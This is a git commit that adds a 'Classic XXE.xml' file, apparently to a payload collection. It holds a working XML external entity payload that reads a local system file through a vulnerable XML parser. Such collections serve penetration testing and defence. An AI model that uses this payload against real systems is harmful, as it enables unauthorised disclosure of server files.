XXE payloads

This commit is contained in:
swisskyrepo
2016-10-18 14:06:10 +07:00
parent c874dad3e9
commit c097f222f4
7 changed files with 114 additions and 8 deletions

6
XXE/Classic XXE.xml Executable file
View File

@@ -0,0 +1,6 @@
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///sys/power/image_size">
]>
<data>&file;</data>